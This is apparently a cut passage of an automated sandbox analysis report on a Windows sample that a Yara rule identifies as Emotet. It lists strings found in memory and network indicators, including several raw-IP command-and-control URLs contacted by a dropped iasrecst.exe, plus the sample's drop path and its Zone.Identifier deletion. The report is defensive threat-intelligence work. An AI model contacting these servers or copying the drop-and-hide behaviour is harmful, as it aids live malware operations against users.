","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000016.00000003.393796977.000001DCAE763000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-02T18:22:42.6875348Z\|\|.\|\|d304cd4c-475a-4125-aa87-5c57cb1f4562\|\|1152921505693241551\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-03-02T18:21:36.4242164Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 00000016.00000003.394281664.000001DCAE725000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","SkuTitle":"Messenger","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","WuCategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64"],"Capabilities":["runFullTrust","internetClient","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":137909932,"PackageFormat":"Appx","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","MainPackageFamilyNameForDlc":null,"PackageFullName":"FACEBOOK.317180B0BB486_910.5.119.0_x64__8xx8rvfyw5nnt","PackageId":"7a013703-edb8-6940-193c-127d899a1d9b-X64","PackageRank":30002,"PlatformDependencies":[{"MaxTested":2814750970478592,"MinVersion":2814750438195200,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"FACEBOOK.317180B0BB486_910.5.119.0_x64__8xx8rvfyw5nnt\",\"content.productId\":\"3219d30d-4a23-4f58-a91c-c44b04e6a0c7\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750970478592,\"platform.minVersion\":2814750438195200,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Social\",\"optOut.backu

Source: unknown

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Mar 2021 15:27:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.153.111:8080/RWKwnR00xL9KFn/8u41u6KEQrM/jtlSmN2GQ/
Source: iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.153.111:8080/RWKwnR00xL9KFn/8u41u6KEQrM/jtlSmN2GQ/l
Source: iasrecst.exe, 00000001.00000003.405645710.0000000002981000.00000004.00000001.sdmp, iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	String found in binary or memory: http://194.187.133.160:443/3El8N8aRynButJ/
Source: iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	String found in binary or memory: http://5.196.108.185:8080/wGf14n07/vS3mZ/aWoW/q
Source: iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.219.147:8080/sYVMb8sSsBN1RjvCK/iGzstLqezClQ/N1nFCPZm6mEYgboT/pmtRsMHWSucuO/QEkDfx4jkf1H
Source: iasrecst.exe, 00000001.00000003.327469162.0000000002981000.00000004.00000001.sdmp	String found in binary or memory: http://96.126.101.6:8080/j8688GhgZ4mpI2/
Source: iasrecst.exe, 00000001.00000003.405531994.0000000002986000.00000004.00000001.sdmp	String found in binary or memory: http://98.174.164.72/2CRvCvWLe/Uxu7RQJUiJql1/
Source: iasrecst.exe, 00000001.00000002.499375661.0000000002970000.00000004.00000001.sdmp	String found in binary or memory: http://98.174.164.72/2CRvCvWLe/Uxu7RQJUiJql1/%
Source: svchost.exe, 00000016.00000002.411881082.000001DCADE70000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.498370452.000002074589B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m
Source: svchost.exe, 00000016.00000002.411881082.000001DCADE70000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.494908534.00000207402BA000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000016.00000002.411881082.000001DCADE70000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000016.00000002.411881082.000001DCADE70000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000002.494908534.00000207402BA000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000006.00000002.498171073.0000020745800000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000006.00000002.498650900.0000020745B10000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000009.00000002.305642289.0000015674A13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000002.494852071.0000021F6323E000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.305136565.0000015674A48000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000002.305686531.0000015674A42000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000002.305686531.0000015674A42000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.305206943.0000015674A40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.305176818.0000015674A5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.305136565.0000015674A48000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.305159865.0000015674A60000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.283475151.0000015674A31000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.305642289.0000015674A13000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.305679371.0000015674A3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.283475151.0000015674A31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.305199569.0000015674A45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.283475151.0000015674A31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000002.305673394.0000015674A3A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000003.305136565.0000015674A48000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000016.00000003.390026009.000001DCAE75A000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000016.00000003.399082619.000001DCAE798000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.399173864.000001DCAE765000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	0_2_00422473
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	0_2_00422488
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	0_2_0041580E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState,	0_2_004238DC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	0_2_0041E95F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_00412ABD
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	0_2_00410E05
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	1_2_00422473
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	1_2_00422488
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	1_2_0041580E
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_004238DC GetKeyState,GetKeyState,GetKeyState,	1_2_004238DC
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	1_2_0041E95F
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,	1_2_00412ABD
Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe	Code function: 1_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	1_2_00410E05

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.494960467.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.231317711.0000000002194000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.496587282.0000000002284000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2ojdmC51As.exe.21e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.71279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.iasrecst.exe.22c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2ojdmC51As.exe.60052e.2.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe

Code function: 1_2_022C2650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,

1_2_022C2650

Source: C:\Users\user\Desktop\2ojdmC51As.exe

File created: C:\Windows\SysWOW64\WsmSvc\

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe

File deleted: C:\Windows\SysWOW64\WsmSvc\iasrecst.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00408293	0_2_00408293
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004145CA	0_2_004145CA
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E8240	0_2_021E8240
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E7740	0_2_021E7740
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E6530	0_2_021E6530
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E3BA0	0_2_021E3BA0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E3F20	0_2_021E3F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E1C70	0_2_021E1C70
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_021E3D10	0_2_021E3D10
